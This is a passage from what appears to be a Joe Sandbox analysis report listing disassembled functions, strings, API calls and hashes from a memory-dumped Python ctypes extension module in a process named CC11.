                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Object_$AttrDeallocString$Err_$Format$CallDict_LookupMallocMem_ObjectOccurredSizeUnicode_Updatestrchr
                                                                                                                                                                  • String ID: __ctype_be__$__ctype_le__$_type_ '%s' not supported$cbBhHiIlLdfuzZqQPXOv?g$class must define a '_type_' attribute$class must define a '_type_' attribute which must bea single character string containing one of '%s'.$class must define a '_type_' attribute which must be a string of length 1$class must define a '_type_' string attribute
                                                                                                                                                                  • API String ID: 1562115708-917751260
                                                                                                                                                                  • Opcode ID: 174102951eecfc0f4f4755dec21c1f3a16aa2c386703cc42a1da506657b2ea6b
                                                                                                                                                                  • Instruction ID: d734b905c0cf1aea86d02b9f8317fe62fbc108632f9ace003f84422e3e6e7129
                                                                                                                                                                  • Opcode Fuzzy Hash: 174102951eecfc0f4f4755dec21c1f3a16aa2c386703cc42a1da506657b2ea6b
                                                                                                                                                                  • Instruction Fuzzy Hash: 36A12A71A09B4281EA549FA9E8902B837A0FF85BD4F588135DF8E47765EF3CE496C310
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc$Err_$Object_String$AttrDict_Long_LookupMallocMem_$CallDescr_ExceptionItemMatchesMemoryObjectOccurredSignSsize_tUpdate
                                                                                                                                                                  • String ID: The '_length_' attribute is too large$The '_length_' attribute must be an integer$The '_length_' attribute must not be negative$_type_ must have storage info$array too large$class must define a '_length_' attribute$class must define a '_type_' attribute
                                                                                                                                                                  • API String ID: 1094985414-504660705
                                                                                                                                                                  • Opcode ID: 618371b017bfb42e6c387fd73ed1a77009a15e34f6dbbb0f99ccff6f8b3ed9d2
                                                                                                                                                                  • Instruction ID: 1cc2590422f38699c30a79e7060a2033b72a207838e9d6d6c1ed8d98888d3b23
                                                                                                                                                                  • Opcode Fuzzy Hash: 618371b017bfb42e6c387fd73ed1a77009a15e34f6dbbb0f99ccff6f8b3ed9d2
                                                                                                                                                                  • Instruction Fuzzy Hash: 49A11921A0AB42D1FB54AFADD8942B937A4FF85BE4F184231DB1E466A5DF3CE495C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$FromNumber_OccurredSsize_tString$Mem_Unicode_$Bytes_CharMallocSizeWide$FreeList_Memory
                                                                                                                                                                  • String ID: Pointer indices must be integer$slice start is required for step < 0$slice step cannot be zero$slice stop is required
                                                                                                                                                                  • API String ID: 869507174-3059441807
                                                                                                                                                                  • Opcode ID: 70b66605ccd097e78c16a38ef12c19642d171d9870e87ce71708b90003173da8
                                                                                                                                                                  • Instruction ID: 5cbb4b5ce04246c051947a433738635de2deb1cf1a0f5f88263406dbd9a16d91
                                                                                                                                                                  • Opcode Fuzzy Hash: 70b66605ccd097e78c16a38ef12c19642d171d9870e87ce71708b90003173da8
                                                                                                                                                                  • Instruction Fuzzy Hash: EDA14021B0AA4281FE949F9DD544179ABA9BF94FE0F044631CB6E47BF6EE2CE455C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$Dealloc$String$Arg_Eval_FormatParseSizeThreadTuple_$AddressAttrAuditLong_Object_OccurredProcRestoreSaveSequence_Sys_TupleVoid
                                                                                                                                                                  • String ID: O&O;illegal func_spec argument$O|O$_handle$could not convert the _handle attribute to a pointer$ctypes.dlsym$function '%s' not found$function ordinal %d not found$the _handle attribute of the second argument must be an integer
                                                                                                                                                                  • API String ID: 247295482-1088195083
                                                                                                                                                                  • Opcode ID: c6efa2341e803b1a4695140a97f4be8c3672992cc7647cd23768f9356f60b82d
                                                                                                                                                                  • Instruction ID: bd2e1a358a6aa8da58e15c91bc0adb8943e5f539e85d0ae18838f67e93406474
                                                                                                                                                                  • Opcode Fuzzy Hash: c6efa2341e803b1a4695140a97f4be8c3672992cc7647cd23768f9356f60b82d
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E71F621A0AA4284EB559FADD8501B83BA0FF84BD4F584536DF1E97BA9DF3CE445C310
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Mem_$CallDict_Err_FreeFunctionItemMallocObject_$DeallocErrorFromLong_OccurredStringUnicode_VoidWith
                                                                                                                                                                  • String ID: LP_%s$_type_$must be a ctypes type$s(O){sO}$s(O){}
                                                                                                                                                                  • API String ID: 2461613936-2311978994
                                                                                                                                                                  • Opcode ID: b2117b3c44d5f46dd7f24c4b35abf2caf2fa320c46810db12cf49d07f67c91ee
                                                                                                                                                                  • Instruction ID: b4ad54673fc8b1d8172b9d38bc554e71d6cc1d4556a3572efe2a1530a3bc00d7
                                                                                                                                                                  • Opcode Fuzzy Hash: b2117b3c44d5f46dd7f24c4b35abf2caf2fa320c46810db12cf49d07f67c91ee
                                                                                                                                                                  • Instruction Fuzzy Hash: 99513725E0EB0385FB159FADA9541B827A4AF86BE0F180635CB1E07BA6DF3CE444C310
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Bytes_Err_FromMem_SizeSlice_String$AdjustFreeIndicesMallocMemoryNumber_OccurredSsize_tUnpack
                                                                                                                                                                  • String ID: indices must be integers
                                                                                                                                                                  • API String ID: 1902650389-2024404580
                                                                                                                                                                  • Opcode ID: 56fc218e470cc9290087d7e1a0b697a8edda5b0b6fe3fe085914f497f61d90d4
                                                                                                                                                                  • Instruction ID: 0d280810565aaea33e96bd87a941ce62fe38f1e2b184a0ebf69715ad7d4b60bf
                                                                                                                                                                  • Opcode Fuzzy Hash: 56fc218e470cc9290087d7e1a0b697a8edda5b0b6fe3fe085914f497f61d90d4
                                                                                                                                                                  • Instruction Fuzzy Hash: 96715C26A0AA4681EF199FAED9441B86BB1FF84FE4B144131DF1E47BA9DE3DE445C300
                                                                                                                                                                  APIs
                                                                                                                                                                  • PyObject_GetAttrString.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB8025F
                                                                                                                                                                  • PySequence_Fast.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB8027B
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB8028D
                                                                                                                                                                  • PyArg_ParseTuple.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB802E6
                                                                                                                                                                  • PyObject_GetAttr.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB802FD
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB8034A
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB803B6
                                                                                                                                                                  • PyObject_SetAttr.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB803C7
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB803DB
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB803F2
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB8040C
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB8041B
                                                                                                                                                                  • PyErr_SetString.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB80453
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB80464
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc$AttrObject_$String$Arg_Err_FastParseSequence_Tuple
                                                                                                                                                                  • String ID: OO|O$_fields_$_fields_ must be a sequence$unexpected type
                                                                                                                                                                  • API String ID: 1182381414-2418103425
                                                                                                                                                                  • Opcode ID: bf701b0b9c5246edb51d4daac37b77ce33a136e741e7a5e3015aa40b30222fbb
                                                                                                                                                                  • Instruction ID: 4c2016ebb4e180f2877a9ac0d317201ff051b482223752d05383363809cb6e89
                                                                                                                                                                  • Opcode Fuzzy Hash: bf701b0b9c5246edb51d4daac37b77ce33a136e741e7a5e3015aa40b30222fbb
                                                                                                                                                                  • Instruction Fuzzy Hash: 0061F932A09A0682EE549FAEE9441B973A0FB89BD4B084135DF5E43B66DF3CE455C300
                                                                                                                                                                  APIs
                                                                                                                                                                  • PyUnicode_FromFormatV.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DC41
                                                                                                                                                                  • PyErr_Fetch.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DC60
                                                                                                                                                                  • PyErr_NormalizeException.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DC72
                                                                                                                                                                  • PyObject_Str.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DC7C
                                                                                                                                                                  • PyUnicode_AppendAndDel.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DC8E
                                                                                                                                                                  • PyUnicode_FromString.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DC9B
                                                                                                                                                                  • PyUnicode_AppendAndDel.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCA8
                                                                                                                                                                  • PyErr_Clear.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCB7
                                                                                                                                                                  • PyObject_Str.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCC1
                                                                                                                                                                  • PyErr_Clear.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCCC
                                                                                                                                                                  • PyUnicode_FromString.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCD9
                                                                                                                                                                  • PyUnicode_AppendAndDel.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCE6
                                                                                                                                                                  • PyErr_SetObject.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCFB
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DD10
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DD25
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DD3A
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DD4F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Unicode_$Err_$Dealloc$AppendFrom$ClearObject_String$ExceptionFetchFormatNormalizeObject
                                                                                                                                                                  • String ID: ???
                                                                                                                                                                  • API String ID: 2201921740-1053719742
                                                                                                                                                                  • Opcode ID: ecb6db16fea7d3ec4b1d10a42f34de8fe402f80ec48bd489ff59f9729515affa
                                                                                                                                                                  • Instruction ID: 5402b7a0c2a68ef9d3c1489c51844268f24eecf74884348ec3e04a01751d29f7
                                                                                                                                                                  • Opcode Fuzzy Hash: ecb6db16fea7d3ec4b1d10a42f34de8fe402f80ec48bd489ff59f9729515affa
                                                                                                                                                                  • Instruction Fuzzy Hash: 8141D572F0BA0295EF059FE9E8541B82770BF88BD9F084535CB0E52A69DE2CE549C350
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc$Err_$Mem_$FormatFree$AttrItemMallocMemoryObject_Sequence_StringUnicode_
                                                                                                                                                                  • String ID: %s:%s:$UO|i$bit fields not allowed for type %s$number of bits invalid for bit field
                                                                                                                                                                  • API String ID: 3175293119-1978056028
                                                                                                                                                                  • Opcode ID: bc37b6ce8a5a7c313a365d20831b984a8754113c41a18f45fcca063f25ce9297
                                                                                                                                                                  • Instruction ID: 9c390a68b3d70c9f1d0cd8e37f4d1d9402c0139322754451ca9696e5e72e189a
                                                                                                                                                                  • Opcode Fuzzy Hash: bc37b6ce8a5a7c313a365d20831b984a8754113c41a18f45fcca063f25ce9297
                                                                                                                                                                  • Instruction Fuzzy Hash: AF914932B09B8285EB50DFA9E9442A97BA4FB84BD4F640136EB5D47BA4DF3CE445C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$String$DeallocEval_Thread$AddressArg_AttrFormatLong_Object_OccurredParseProcRestoreSaveSizeTuple_Void
                                                                                                                                                                  • String ID: Os:in_dll$_handle$could not convert the _handle attribute to a pointer$symbol '%s' not found$the _handle attribute of the second argument must be an integer
                                                                                                                                                                  • API String ID: 3341457601-4011516582
                                                                                                                                                                  • Opcode ID: b1682e2fe6b9403d153e33361adfdb6ece592f2eab746c08e332a8cb71686b83
                                                                                                                                                                  • Instruction ID: b90abc63d66aab3381113c22e803779ed3d266ec4aa3ac6edd4e1dd605e0bc86
                                                                                                                                                                  • Opcode Fuzzy Hash: b1682e2fe6b9403d153e33361adfdb6ece592f2eab746c08e332a8cb71686b83
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E310721A0AA4281FB449FAEE9441B967A4FFC5FD1B188032DB1E47B65DE2CE449C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Bytes_String
                                                                                                                                                                  • String ID: Don't know how to convert parameter %d$_ctypes pymem$int too long to convert
                                                                                                                                                                  • API String ID: 338066286-4137960972
                                                                                                                                                                  • Opcode ID: 33638274120b6691e25a71324b87940aeb91d1c20ca3e18fdcd3bc5151672ed0
                                                                                                                                                                  • Instruction ID: cccf5181b86548c1b19daf808531bbff99bd487747566a116bc904812df269ec
                                                                                                                                                                  • Opcode Fuzzy Hash: 33638274120b6691e25a71324b87940aeb91d1c20ca3e18fdcd3bc5151672ed0
                                                                                                                                                                  • Instruction Fuzzy Hash: 13611A32B09B4282EB448FA9E88017877A4FF89BD4B584535DB5E437A5EF3CE465C340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeallocDict_$CallErr_ErrorFromFunction_ItemLong_Object_OccurredPackSizeSsize_tTuple_With
                                                                                                                                                                  • String ID: %.200s_Array_%Id$Array length must be >= 0, not %zd$Expected a type object$_length_$_type_$s(O){s:n,s:O}
                                                                                                                                                                  • API String ID: 2975079148-1488966637
                                                                                                                                                                  • Opcode ID: ea3da00a8fa99686a37871fc0586e0d07918280253ef6fcdb7a7c757238627c5
                                                                                                                                                                  • Instruction ID: 364c37ae874c3722bd935ba05a9ea512108220a1af62fc56db44825d9d64dcaf
                                                                                                                                                                  • Opcode Fuzzy Hash: ea3da00a8fa99686a37871fc0586e0d07918280253ef6fcdb7a7c757238627c5
                                                                                                                                                                  • Instruction Fuzzy Hash: 67513B21A0EB4285FB549FEAE8542B927A4FF85BD4F184435DB0E4A7A6EF3CE404C310
                                                                                                                                                                  APIs
                                                                                                                                                                  • PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B72D
                                                                                                                                                                  • PyObject_CallObject.PYTHON38 ref: 00007FF8BFB7B767
                                                                                                                                                                    • Part of subcall function 00007FF8BFB7B6E8: _Py_Dealloc.PYTHON38 ref: 00007FF8BFB7B7D2
                                                                                                                                                                    • Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7B7F6
                                                                                                                                                                    • Part of subcall function 00007FF8BFB7B6E8: PyErr_Format.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B83C
                                                                                                                                                                    • Part of subcall function 00007FF8BFB7B6E8: PyObject_IsInstance.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B84D
                                                                                                                                                                    • Part of subcall function 00007FF8BFB7B6E8: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B86E
                                                                                                                                                                    • Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B883
                                                                                                                                                                    • Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B8BF
                                                                                                                                                                    • Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B8D9
                                                                                                                                                                    • Part of subcall function 00007FF8BFB7B6E8: PyTuple_Pack.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B94A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: SubtypeType_$Object_$CallDeallocErr_FormatInstanceObjectPackTuple_memcpy
                                                                                                                                                                  • String ID: (%s) $expected %s instance, got %s$incompatible types, %s instance instead of %s instance
                                                                                                                                                                  • API String ID: 1877528213-3177377183
